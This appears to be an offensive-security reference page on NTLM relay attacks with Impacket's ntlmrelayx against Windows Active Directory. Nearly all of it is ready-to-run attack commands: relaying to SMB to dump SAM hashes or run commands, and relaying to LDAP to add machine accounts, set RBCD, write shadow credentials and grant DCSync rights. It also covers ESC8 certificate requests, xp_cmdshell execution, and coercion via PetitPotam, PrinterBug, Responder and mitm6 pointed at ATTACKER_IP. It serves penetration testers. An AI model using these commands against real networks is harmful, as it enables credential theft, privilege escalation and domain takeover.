Skip to main content

Overview

ntlmrelayx intercepts NTLM authentication and relays it to a target service, executing actions with the victim’s privileges. It does not crack passwords — it forwards the live authentication handshake to a different host. Works against targets where SMB signing is not required (for SMB relay) or where LDAP/HTTP/MSSQL accept NTLM. 
# Install
pip install impacket
# Or from source
git clone https://github.com/fortra/impacket && cd impacket && pip install .

Enumerate Relay Targets

Before relaying, identify hosts that do not require SMB signing. 
# NetExec — generate relay target list
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

# Targets with SMB signing disabled/not required end up in targets.txt
cat targets.txt

Basic Relay to SMB

Relay captured NTLM auth to SMB on another host. Dumps SAM hashes by default if the relayed user is a local admin. 
# Dump SAM (default action)
impacket-ntlmrelayx -tf targets.txt -smb2support

# Execute a command instead
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami > C:\temp\pwned.txt"

# Get an interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i

# Relay to a single target
impacket-ntlmrelayx -t smb://10.10.10.5 -smb2support

Relay to LDAP

Relaying to LDAP allows domain-level attacks: creating machine accounts, setting RBCD, writing shadow credentials, or modifying ACLs. Requires the relayed account to have the necessary privileges (e.g., domain admin, or any user if ms-DS-MachineAccountQuota > 0).

Add a Computer Account

impacket-ntlmrelayx -t ldap://DC01.corp.local --add-computer FAKEPC$ 'P@ssw0rd!'

Resource-Based Constrained Delegation (RBCD)

Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target so your controlled computer can impersonate any user to the target. 
# Step 1: Relay to LDAP and set RBCD on the target machine
impacket-ntlmrelayx -t ldap://DC01.corp.local --delegate-access --escalate-user FAKEPC$

# Step 2: Request a service ticket via S4U
impacket-getST -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.10.10.1 'corp.local/FAKEPC$:P@ssw0rd!'

# Step 3: Use the ticket
export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache
impacket-psexec -k -no-pass TARGET.corp.local

Shadow Credentials

Write msDS-KeyCredentialLink to obtain a certificate for the relayed machine account, then request a TGT. 
impacket-ntlmrelayx -t ldap://DC01.corp.local --shadow-credentials --shadow-target TARGET$

ACL Abuse (Escalate User)

Grant a controlled user DCSync or other privileges. 
# Grant DCSync rights to a controlled user
impacket-ntlmrelayx -t ldap://DC01.corp.local --escalate-user lowprivuser

Relay to AD CS (ESC8)

If AD CS has the HTTP enrollment endpoint enabled, relay NTLM auth to request a certificate as the victim. 
# Relay to the CA web enrollment endpoint
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# For a machine account certificate (combine with PetitPotam)
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template Machine
Use the resulting Base64 certificate with certipy or impacket-getTGT: 
# Authenticate with the certificate
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1

Relay to MSSQL

Execute SQL queries through a relayed NTLM session. 
# Execute a query
impacket-ntlmrelayx -t mssql://10.10.10.20 -smb2support -q "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

# Enable xp_cmdshell and run OS command
impacket-ntlmrelayx -t mssql://10.10.10.20 -smb2support -q "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami';"

Targets File (-tf)

The targets file supports protocols and multiple hosts. 
smb://10.10.10.5
smb://10.10.10.6
ldap://DC01.corp.local
ldaps://DC01.corp.local
http://CA01.corp.local/certsrv/certfnsh.asp
mssql://10.10.10.20

impacket-ntlmrelayx -tf targets.txt -smb2support

Combine with Responder

Responder poisons LLMNR/NBT-NS/mDNS to capture NTLM authentication. Disable SMB and HTTP in Responder so ntlmrelayx receives the connections instead. 
# Edit Responder config — disable SMB and HTTP servers
# /etc/responder/Responder.conf (or /usr/share/responder/Responder.conf)
# SMB = Off
# HTTP = Off

# Start Responder (poisoning only)
sudo responder -I eth0 -dwPv

# In another terminal — start ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support

Combine with PetitPotam / PrinterBug

Coerce a machine account to authenticate to your relay server. Machine account auth is useful for RBCD, shadow credentials, and AD CS attacks.

PetitPotam (MS-EFSRPC)

# Coerce DC01 to authenticate to your relay listener
python3 PetitPotam.py ATTACKER_IP DC01.corp.local

# ntlmrelayx catches DC01$ machine account authentication
impacket-ntlmrelayx -t ldap://DC02.corp.local --delegate-access --escalate-user FAKEPC$

# Or relay to AD CS
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp --adcs --template DomainController

PrinterBug (MS-RPRN)

# Coerce target to authenticate back to attacker
python3 dementor.py ATTACKER_IP TARGET.corp.local -u user -p pass -d corp.local

# Or with SpoolSample
SpoolSample.exe TARGET.corp.local ATTACKER_IP

SOCKS Proxy Mode

Keep relayed sessions alive and interact with them through a SOCKS proxy. Useful for maintaining access across multiple relayed sessions. 
# Start ntlmrelayx in SOCKS mode
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# List active sessions in the ntlmrelayx console
ntlmrelayx> socks

# Use proxychains with the SOCKS proxy (default port 1080)
# /etc/proxychains.conf: socks4 127.0.0.1 1080
proxychains impacket-secretsdump corp.local/[email protected]

proxychains impacket-smbclient //10.10.10.5/C$ -no-pass

proxychains nxc smb 10.10.10.5 -u relayeduser -p '' -d corp.local --sam

IPv6 Attack with mitm6

mitm6 poisons DHCPv6 and DNS to redirect NTLM auth from IPv6-enabled Windows hosts. 
# Terminal 1: Start mitm6
sudo mitm6 -d corp.local

# Terminal 2: Start ntlmrelayx targeting LDAP
impacket-ntlmrelayx -6 -t ldaps://DC01.corp.local -wh wpad.corp.local --delegate-access --add-computer
The -6 flag enables IPv6 listening. The -wh flag sets up a WPAD server to trigger proxy authentication.

Remove MIC (CVE-2019-1040)

The Message Integrity Code (MIC) prevents relay modification. Removing it bypasses this protection on unpatched targets. 
impacket-ntlmrelayx -t ldap://DC01.corp.local --remove-mic --escalate-user lowprivuser
This drops the MIC from the NTLM AUTHENTICATE_MESSAGE, allowing the relay to succeed against targets vulnerable to CVE-2019-1040 (pre-June 2019 patches).

Quick Reference

TaskCommand
Relay to SMB (dump SAM)impacket-ntlmrelayx -tf targets.txt -smb2support
Relay to SMB (exec command)impacket-ntlmrelayx -t smb://HOST -c "cmd"
Relay to LDAP (add computer)impacket-ntlmrelayx -t ldap://DC --add-computer
Relay to LDAP (RBCD)impacket-ntlmrelayx -t ldap://DC --delegate-access --escalate-user PC$
Relay to LDAP (shadow creds)impacket-ntlmrelayx -t ldap://DC --shadow-credentials --shadow-target TARGET$
Relay to AD CS (ESC8)impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp --adcs --template Machine
Relay to MSSQLimpacket-ntlmrelayx -t mssql://HOST -q "SELECT SYSTEM_USER"
SOCKS modeimpacket-ntlmrelayx -tf targets.txt -socks
IPv6 + LDAP relayimpacket-ntlmrelayx -6 -t ldaps://DC -wh wpad.corp.local
Remove MIC (CVE-2019-1040)impacket-ntlmrelayx -t ldap://DC --remove-mic
Gen relay targets (nxc)nxc smb SUBNET --gen-relay-list targets.txt